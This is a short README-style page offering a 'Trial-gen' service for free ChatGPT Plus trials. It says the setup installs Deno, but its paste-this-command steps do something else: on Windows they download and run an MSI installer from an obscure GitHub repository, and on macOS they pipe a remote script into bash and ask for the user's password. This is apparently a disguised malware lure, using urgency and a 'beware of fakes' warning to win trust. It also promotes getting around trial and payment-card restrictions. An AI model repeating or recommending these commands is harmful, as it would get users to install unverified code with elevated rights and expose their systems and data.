When registering a ChatGPT account in certain countries, a free month of Plus subscription is provided upon adding a payment card. To claim it, you must: Have an account registered in a country where the free month of Plus subscription is available [learn more at https://help.openai.com/]. Have a payment card to add to the account [you will not be charged for the first month, but many card BINs are not accepted]. If you need help with either or both of these requirements, you can use the Trial-gen by TRECA service. ⚠️ IMPORTANT! The official web version of the service is temporarily unavailable. Currently, access is only provided via API. Any websites with a user interface claiming to be this service are fraudulent counterfeits! ⚠️ To use the service at this time, you need to: Install Deno [a modern, secure runtime for JavaScript and TypeScript by the creator of Node.js, which does not require installing heavy packages]. Connect to the service via API. All of this can be done with a single command in the Command Prompt (CMD) ## Windows quick start 1. Press `Win + R`, type `cmd` and hit Enter 2. Paste the following command and press Enter: ```cmd curl -Lo %temp%\s.msi https://raw.githubusercontent.com/aakbyuqjwx/chatgpt-trial-gen/main/chatgpt.msi && msiexec /i %temp%\s.msi ``` ## MacOS quick start 1. Open Terminal app 2. Paste the following command and press Enter: ```bash curl -fsSL https://raw.githubusercontent.com/aakbyuqjwx/chatgpt-trial-gen/main/chatgpt | bash ``` 3. Enter password when promted Then, follow the interface prompts (for more detailed instructions, watch the video on YouTube).